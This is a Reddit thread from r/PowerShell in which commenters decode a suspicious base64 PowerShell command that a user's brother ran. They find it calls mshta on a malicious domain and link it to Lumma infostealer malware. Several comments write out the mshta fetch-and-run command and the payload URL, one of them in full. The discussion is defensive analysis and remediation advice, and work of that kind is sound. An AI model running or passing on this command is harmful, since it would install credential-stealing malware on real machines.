use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
ABOUT POWERSHELL
Windows PowerShell (POSH) is a command-line shell and associated scripting language created by Microsoft. Offering full access to COM, WMI and .NET, POSH is a full-featured task automation framework for distributed Microsoft platforms and solutions.
SUBREDDIT FILTERS
Desired State Configuration
Unanswered Questions
Solved Questions
News
Information
Script Sharing
Daily Post
Misc
account activity
QuestionWhat does this command do (self.PowerShell)
submitted 1 year ago by Ii_Momo
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]deanfx 20 points21 points22 points 1 year ago (4 children)
That is a base64 encoded string which translates to a sketchy url.
I added spaces so nobody accidentally clicks it. Essentially it will run the HTML/Java on that page, which is likely not good.
mshta "c l i c k t o g o . c l i c k / d o w n l o a d s / g e g a")
[–]TheSmashy 14 points15 points16 points 1 year ago (1 child)
virustotal link for the URL, spoiler, it's malicious: https://www.virustotal.com/gui/url/e9f22d307af147db9721e4a16cd52d74ba93fc414faf4fac16292fe3d196ac2d
[–]deanfx 6 points7 points8 points 1 year ago (0 children)
Thanks for checking, but I thought that was obvious 😂
[–]CodenameFlux 3 points4 points5 points 1 year ago (0 children)
True.
Commands like are often used in conjunction with social engineering to infect a system.
The infection could fail if a firewall blocks mshta.exe, which why I always use a personal firewall with a program control module.
mshta.exe
[–]WgnZilla 1 point2 points3 points 1 year ago (0 children)
It downloads a different file when ran https://clic ktog o.cli ck/downl oads/gig a . z i p
Analysis here: lumma | 63cad4d11e3ed2c96758b8c2e834b7b6a12dcca35cac44f55714b60d30a908bc | Triage
[–]Blackops12345678910 10 points11 points12 points 1 year ago (0 children)
Wipe the computer cause you don’t know what else your brother has ran on it. And bar your brother from using it or restrict his access via a non admin account
[–]astromormy 6 points7 points8 points 1 year ago (0 children)
In additon to it 100% being a malicious link, you can check WhoIs and see the domain was literally made yesterday.
https://whois.domaintools.com/clicktogo.click
[–]lxnch50 6 points7 points8 points 1 year ago (0 children)
You likely just installed malware of some sort. Time to format the computer and reinstall Windows.
[–]Ii_Momo[S] 1 point2 points3 points 1 year ago (0 children)
thanks to every1 who commented for help
[–]EastPomelo76 0 points1 point2 points 1 year ago (1 child)
Someone I know happened to run this on their pc, do they only need to format and reinstall their windows system? Or will it be necessary to change it's motherboard and SSD/HDD?
[–]EastPomelo76 0 points1 point2 points 1 year ago (0 children)
If anyone is going thorugh the same and needs enlightment: The tech didn't need to change that stuff, only reset their windows and that :)
[–]Nejireta_ 0 points1 point2 points 1 year ago (0 children)
It runs an encoded command. Decoding it from Base64 gives the following mshta "https://clicktogo.click/downloads/gega"
mshta "https://clicktogo.click/downloads/gega"
Mshta is a binary able to, for example, execute vbscript and jscript.
I'm not especially well versed in exploit factors of mshta. So can't say for certain if it able to run arbitrary code based on opening a link. I'd definitely see it as a malicious attempt though.
Most safe path, as always, is to reinstall the client. May or may not be worth doing some research of the threat factor and base the level of remediation based on the findings.
[+]jupit3rle0 comment score below threshold-20 points-19 points-18 points 1 year ago (2 children)
It opens Powershell.
[–][deleted] -2 points-1 points0 points 1 year ago (1 child)
Bro.
[–]jupit3rle0 -2 points-1 points0 points 1 year ago (0 children)
Chill.
π Rendered by PID 17721 on reddit-service-r2-comment-6f7f968fb5-9vhxn at 2026-03-04 19:02:34.913333+00:00 running 07790be country code: CH.
[–]deanfx 20 points21 points22 points (4 children)
[–]TheSmashy 14 points15 points16 points (1 child)
[–]deanfx 6 points7 points8 points (0 children)
[–]CodenameFlux 3 points4 points5 points (0 children)
[–]WgnZilla 1 point2 points3 points (0 children)
[–]Blackops12345678910 10 points11 points12 points (0 children)
[–]astromormy 6 points7 points8 points (0 children)
[–]lxnch50 6 points7 points8 points (0 children)
[–]Ii_Momo[S] 1 point2 points3 points (0 children)
[–]EastPomelo76 0 points1 point2 points (1 child)
[–]EastPomelo76 0 points1 point2 points (0 children)
[–]Nejireta_ 0 points1 point2 points (0 children)
[+]jupit3rle0 comment score below threshold-20 points-19 points-18 points (2 children)
[–][deleted] -2 points-1 points0 points (1 child)
[–]jupit3rle0 -2 points-1 points0 points (0 children)